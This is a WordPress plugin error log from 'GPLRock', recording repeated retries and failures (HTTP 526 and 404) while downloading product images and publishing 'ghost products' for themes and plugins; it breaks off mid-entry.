[05-Apr-2026 11:59:21 UTC] GPLRock: Image download failed for product responsive-interactive-table (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:23 UTC] GPLRock: Image download failed for product responsive-interactive-table (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-interactive-table-16124.webp for product responsive-interactive-table after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:59:25 UTC] GPLRock: Image download failed for product responsive-interactive-table (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:27 UTC] GPLRock: Image download failed for product responsive-interactive-table (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-interactive-table-16124.webp for product responsive-interactive-table after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:59:29 UTC] GPLRock WARNING: Image download failed for product responsive-interactive-table. URL: https://meldwp.com/wp-content/uploads/responsive-interactive-table-16124.webp [05-Apr-2026 11:59:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: responsive-interactive-table [05-Apr-2026 11:59:29 UTC] GPLRock: Image download failed for product download-file-name-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:31 UTC] GPLRock: Image download failed for product download-file-name-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/download-file-name-for-woocommerce-20217.webp for product download-file-name-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:59:34 UTC] GPLRock: Image download failed for product download-file-name-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:36 UTC] GPLRock: Image download failed for product download-file-name-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/download-file-name-for-woocommerce-20217.webp for product download-file-name-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:59:38 UTC] GPLRock WARNING: Image download failed for product download-file-name-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/download-file-name-for-woocommerce-20217.webp [05-Apr-2026 11:59:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: download-file-name-for-woocommerce [05-Apr-2026 12:00:00 UTC] GPLRock: Image downloaded successfully for product mediacenter-electronics-store-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e11d2255.jpg [05-Apr-2026 12:00:00 UTC] GPLRock: Using pre-downloaded image for product mediacenter-electronics-store-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e11d2255.jpg [05-Apr-2026 12:00:00 UTC] GPLRock: Ghost product published with image - Product ID: mediacenter-electronics-store-woocommerce-theme [05-Apr-2026 12:00:05 UTC] GPLRock: Image download failed for product cryptocurrency-widgets-pro-wordpress-crypto-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:00:09 UTC] GPLRock: Image download failed for product cryptocurrency-widgets-pro-wordpress-crypto-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:00:13 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/Cryptocurrency-Widgets-Pro-WordPress-Crypto-Plugin.jpg for product cryptocurrency-widgets-pro-wordpress-crypto-plugin after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 12:00:15 UTC] GPLRock: Image download failed for product cryptocurrency-widgets-pro-wordpress-crypto-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:00:19 UTC] GPLRock: Image download failed for product cryptocurrency-widgets-pro-wordpress-crypto-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:00:23 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/07/Cryptocurrency-Widgets-Pro-WordPress-Crypto-Plugin.jpg for product cryptocurrency-widgets-pro-wordpress-crypto-plugin after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 12:00:23 UTC] GPLRock WARNING: Image download failed for product cryptocurrency-widgets-pro-wordpress-crypto-plugin. URL: https://www.gplrock.com/wp-content/uploads/2021/07/Cryptocurrency-Widgets-Pro-WordPress-Crypto-Plugin.jpg [05-Apr-2026 12:00:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cryptocurrency-widgets-pro-wordpress-crypto-plugin [05-Apr-2026 12:00:25 UTC] GPLRock: Image downloaded successfully for product ninja-forms-salesforce-crm (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe6085c0.jpg [05-Apr-2026 12:00:25 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-salesforce-crm: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe6085c0.jpg [05-Apr-2026 12:00:25 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-salesforce-crm [05-Apr-2026 12:00:26 UTC] GPLRock: Image downloaded successfully for product ninja-forms-cleverreach (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2911f55.jpg [05-Apr-2026 12:00:26 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-cleverreach: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2911f55.jpg [05-Apr-2026 12:00:26 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-cleverreach [05-Apr-2026 12:00:28 UTC] GPLRock: Image downloaded successfully for product studiopress-breakthrough-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a57019c1.jpg [05-Apr-2026 12:00:28 UTC] GPLRock: Using pre-downloaded image for product studiopress-breakthrough-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a57019c1.jpg [05-Apr-2026 12:00:28 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-breakthrough-pro-genesis-wordpress-theme [05-Apr-2026 12:00:29 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-woocommerce-reviews (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd5ab515.jpg [05-Apr-2026 12:00:29 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-woocommerce-reviews: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd5ab515.jpg [05-Apr-2026 12:00:29 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-woocommerce-reviews [05-Apr-2026 12:00:31 UTC] GPLRock: Image downloaded successfully for product studiopress-niche-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-55c0f1bd.jpg [05-Apr-2026 12:00:31 UTC] GPLRock: Using pre-downloaded image for product studiopress-niche-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-55c0f1bd.jpg [05-Apr-2026 12:00:31 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-niche-pro-genesis-wordpress-theme [05-Apr-2026 12:00:32 UTC] GPLRock: Image downloaded successfully for product ninja-forms-user-management (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4a78c9ee.jpg [05-Apr-2026 12:00:32 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-user-management: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4a78c9ee.jpg [05-Apr-2026 12:00:32 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-user-management [05-Apr-2026 12:00:34 UTC] GPLRock: Image downloaded successfully for product woocommerce-ajax-enabled-enhanced-layered-navigation (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a369b0bf.jpg [05-Apr-2026 12:00:34 UTC] GPLRock: Using pre-downloaded image for product woocommerce-ajax-enabled-enhanced-layered-navigation: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a369b0bf.jpg [05-Apr-2026 12:00:34 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-ajax-enabled-enhanced-layered-navigation [05-Apr-2026 12:00:35 UTC] GPLRock: Image downloaded successfully for product cobaltapps-beaver-extender (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9ae48c5c.jpg [05-Apr-2026 12:00:35 UTC] GPLRock: Using pre-downloaded image for product cobaltapps-beaver-extender: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9ae48c5c.jpg [05-Apr-2026 12:00:35 UTC] GPLRock: Ghost product published with image - Product ID: cobaltapps-beaver-extender [05-Apr-2026 12:00:58 UTC] GPLRock: Image download failed for product aoki-creative-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:00 UTC] GPLRock: Image download failed for product aoki-creative-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aoki---creative-design-agency-wordpress-theme-32977.webp for product aoki-creative-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:03 UTC] GPLRock: Image download failed for product aoki-creative-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:05 UTC] GPLRock: Image download failed for product aoki-creative-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aoki---creative-design-agency-wordpress-theme-32977.webp for product aoki-creative-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:07 UTC] GPLRock WARNING: Image download failed for product aoki-creative-design-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aoki---creative-design-agency-wordpress-theme-32977.webp [05-Apr-2026 12:01:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aoki-creative-design-agency-wordpress-theme [05-Apr-2026 12:01:07 UTC] GPLRock: Image download failed for product brook-light-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:09 UTC] GPLRock: Image download failed for product brook-light-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brook--light--responsive-wordpress-blog-theme-22995.webp for product brook-light-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:11 UTC] GPLRock: Image download failed for product brook-light-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:13 UTC] GPLRock: Image download failed for product brook-light-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brook--light--responsive-wordpress-blog-theme-22995.webp for product brook-light-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:15 UTC] GPLRock WARNING: Image download failed for product brook-light-responsive-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/brook--light--responsive-wordpress-blog-theme-22995.webp [05-Apr-2026 12:01:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: brook-light-responsive-wordpress-blog-theme [05-Apr-2026 12:01:16 UTC] GPLRock: Image download failed for product luxestay-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:18 UTC] GPLRock: Image download failed for product luxestay-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxestay---hotel-booking-wordpress-theme-27312.webp for product luxestay-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:20 UTC] GPLRock: Image download failed for product luxestay-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:22 UTC] GPLRock: Image download failed for product luxestay-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxestay---hotel-booking-wordpress-theme-27312.webp for product luxestay-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:24 UTC] GPLRock WARNING: Image download failed for product luxestay-hotel-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/luxestay---hotel-booking-wordpress-theme-27312.webp [05-Apr-2026 12:01:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxestay-hotel-booking-wordpress-theme [05-Apr-2026 12:01:24 UTC] GPLRock: Image download failed for product yogacare-coach-speaker-motivation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:26 UTC] GPLRock: Image download failed for product yogacare-coach-speaker-motivation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yogacare---coach-speaker--motivation-wordpress-theme-18611.webp for product yogacare-coach-speaker-motivation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:29 UTC] GPLRock: Image download failed for product yogacare-coach-speaker-motivation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:31 UTC] GPLRock: Image download failed for product yogacare-coach-speaker-motivation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yogacare---coach-speaker--motivation-wordpress-theme-18611.webp for product yogacare-coach-speaker-motivation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:33 UTC] GPLRock WARNING: Image download failed for product yogacare-coach-speaker-motivation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/yogacare---coach-speaker--motivation-wordpress-theme-18611.webp [05-Apr-2026 12:01:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yogacare-coach-speaker-motivation-wordpress-theme [05-Apr-2026 12:01:33 UTC] GPLRock: Image download failed for product facit-react-react-admin-template-create-react-app-vite-or-nextjs-react-ts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:35 UTC] GPLRock: Image download failed for product facit-react-react-admin-template-create-react-app-vite-or-nextjs-react-ts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/facit-react--react-admin-template-create-react-app-vite-or-nextjs-react-ts-29628.webp for product facit-react-react-admin-template-create-react-app-vite-or-nextjs-react-ts after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:38 UTC] GPLRock: Image download failed for product facit-react-react-admin-template-create-react-app-vite-or-nextjs-react-ts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:40 UTC] GPLRock: Image download failed for product facit-react-react-admin-template-create-react-app-vite-or-nextjs-react-ts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/facit-react--react-admin-template-create-react-app-vite-or-nextjs-react-ts-29628.webp for product facit-react-react-admin-template-create-react-app-vite-or-nextjs-react-ts after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:42 UTC] GPLRock WARNING: Image download failed for product facit-react-react-admin-template-create-react-app-vite-or-nextjs-react-ts. URL: https://meldwp.com/wp-content/uploads/facit-react--react-admin-template-create-react-app-vite-or-nextjs-react-ts-29628.webp [05-Apr-2026 12:01:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: facit-react-react-admin-template-create-react-app-vite-or-nextjs-react-ts [05-Apr-2026 12:01:42 UTC] GPLRock: Image download failed for product getcab-online-taxi-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:44 UTC] GPLRock: Image download failed for product getcab-online-taxi-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/getcab--online-taxi-service-wordpress-theme-11533.webp for product getcab-online-taxi-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:46 UTC] GPLRock: Image download failed for product getcab-online-taxi-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:49 UTC] GPLRock: Image download failed for product getcab-online-taxi-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/getcab--online-taxi-service-wordpress-theme-11533.webp for product getcab-online-taxi-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:51 UTC] GPLRock WARNING: Image download failed for product getcab-online-taxi-service-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/getcab--online-taxi-service-wordpress-theme-11533.webp [05-Apr-2026 12:01:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: getcab-online-taxi-service-wordpress-theme [05-Apr-2026 12:01:51 UTC] GPLRock: Image download failed for product evalo-minimal-saas-startup-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:53 UTC] GPLRock: Image download failed for product evalo-minimal-saas-startup-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evalo---minimal-saas-startup--agency-wordpress-theme-26770.webp for product evalo-minimal-saas-startup-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:55 UTC] GPLRock: Image download failed for product evalo-minimal-saas-startup-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:57 UTC] GPLRock: Image download failed for product evalo-minimal-saas-startup-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:01:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evalo---minimal-saas-startup--agency-wordpress-theme-26770.webp for product evalo-minimal-saas-startup-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:01:59 UTC] GPLRock WARNING: Image download failed for product evalo-minimal-saas-startup-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/evalo---minimal-saas-startup--agency-wordpress-theme-26770.webp [05-Apr-2026 12:01:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: evalo-minimal-saas-startup-agency-wordpress-theme [05-Apr-2026 12:01:59 UTC] GPLRock: Image downloaded successfully for product absolute-fitness-fitness-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de80369c.webp [05-Apr-2026 12:01:59 UTC] GPLRock: Using pre-downloaded image for product absolute-fitness-fitness-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de80369c.webp [05-Apr-2026 12:01:59 UTC] GPLRock: Ghost product published with image - Product ID: absolute-fitness-fitness-multipurpose-wordpress-theme [05-Apr-2026 12:02:00 UTC] GPLRock: Image download failed for product advisero-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:02 UTC] GPLRock: Image download failed for product advisero-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advisero---consulting-wordpress-theme-30339.webp for product advisero-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:02:04 UTC] GPLRock: Image download failed for product advisero-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:06 UTC] GPLRock: Image download failed for product advisero-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advisero---consulting-wordpress-theme-30339.webp for product advisero-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:02:08 UTC] GPLRock WARNING: Image download failed for product advisero-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/advisero---consulting-wordpress-theme-30339.webp [05-Apr-2026 12:02:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advisero-consulting-wordpress-theme [05-Apr-2026 12:02:08 UTC] GPLRock: Image download failed for product pairgiver-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:11 UTC] GPLRock: Image download failed for product pairgiver-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pairgiver---senior-care-wordpress-theme-11617.webp for product pairgiver-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:02:13 UTC] GPLRock: Image download failed for product pairgiver-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:15 UTC] GPLRock: Image download failed for product pairgiver-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pairgiver---senior-care-wordpress-theme-11617.webp for product pairgiver-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:02:17 UTC] GPLRock WARNING: Image download failed for product pairgiver-senior-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pairgiver---senior-care-wordpress-theme-11617.webp [05-Apr-2026 12:02:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pairgiver-senior-care-wordpress-theme [05-Apr-2026 12:02:43 UTC] GPLRock: Image download failed for product saasto-software-startup-saas-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:45 UTC] GPLRock: Image download failed for product saasto-software-startup-saas-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saasto--software--startup-saas-elementor-wordpress-theme-2708.webp for product saasto-software-startup-saas-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:02:48 UTC] GPLRock: Image download failed for product saasto-software-startup-saas-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:50 UTC] GPLRock: Image download failed for product saasto-software-startup-saas-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saasto--software--startup-saas-elementor-wordpress-theme-2708.webp for product saasto-software-startup-saas-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:02:52 UTC] GPLRock WARNING: Image download failed for product saasto-software-startup-saas-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saasto--software--startup-saas-elementor-wordpress-theme-2708.webp [05-Apr-2026 12:02:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saasto-software-startup-saas-elementor-wordpress-theme [05-Apr-2026 12:02:52 UTC] GPLRock: Image download failed for product zenura-yoga-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:54 UTC] GPLRock: Image download failed for product zenura-yoga-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zenura---yoga-wordpress-theme-2130.webp for product zenura-yoga-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:02:56 UTC] GPLRock: Image download failed for product zenura-yoga-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:02:58 UTC] GPLRock: Image download failed for product zenura-yoga-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zenura---yoga-wordpress-theme-2130.webp for product zenura-yoga-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:00 UTC] GPLRock WARNING: Image download failed for product zenura-yoga-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zenura---yoga-wordpress-theme-2130.webp [05-Apr-2026 12:03:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zenura-yoga-wordpress-theme [05-Apr-2026 12:03:01 UTC] GPLRock: Image download failed for product aimer-wedding-wordpress-theme-for-lovers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:03 UTC] GPLRock: Image download failed for product aimer-wedding-wordpress-theme-for-lovers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aimer---wedding-wordpress-theme-for-lovers-23189.webp for product aimer-wedding-wordpress-theme-for-lovers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:05 UTC] GPLRock: Image download failed for product aimer-wedding-wordpress-theme-for-lovers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:07 UTC] GPLRock: Image download failed for product aimer-wedding-wordpress-theme-for-lovers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aimer---wedding-wordpress-theme-for-lovers-23189.webp for product aimer-wedding-wordpress-theme-for-lovers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:09 UTC] GPLRock WARNING: Image download failed for product aimer-wedding-wordpress-theme-for-lovers. URL: https://meldwp.com/wp-content/uploads/aimer---wedding-wordpress-theme-for-lovers-23189.webp [05-Apr-2026 12:03:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aimer-wedding-wordpress-theme-for-lovers [05-Apr-2026 12:03:09 UTC] GPLRock: Image downloaded successfully for product mixmart-handmade-shop-wordpress-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53999a59.webp [05-Apr-2026 12:03:09 UTC] GPLRock: Using pre-downloaded image for product mixmart-handmade-shop-wordpress-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53999a59.webp [05-Apr-2026 12:03:09 UTC] GPLRock: Ghost product published with image - Product ID: mixmart-handmade-shop-wordpress-woocommerce-theme [05-Apr-2026 12:03:10 UTC] GPLRock: Image download failed for product rango-elegant-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:12 UTC] GPLRock: Image download failed for product rango-elegant-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rango--elegant-fashion-woocommerce-wordpress-theme-9753.webp for product rango-elegant-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:14 UTC] GPLRock: Image download failed for product rango-elegant-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:16 UTC] GPLRock: Image download failed for product rango-elegant-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rango--elegant-fashion-woocommerce-wordpress-theme-9753.webp for product rango-elegant-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:18 UTC] GPLRock WARNING: Image download failed for product rango-elegant-fashion-woocommerce-wordpress-theme. URL: 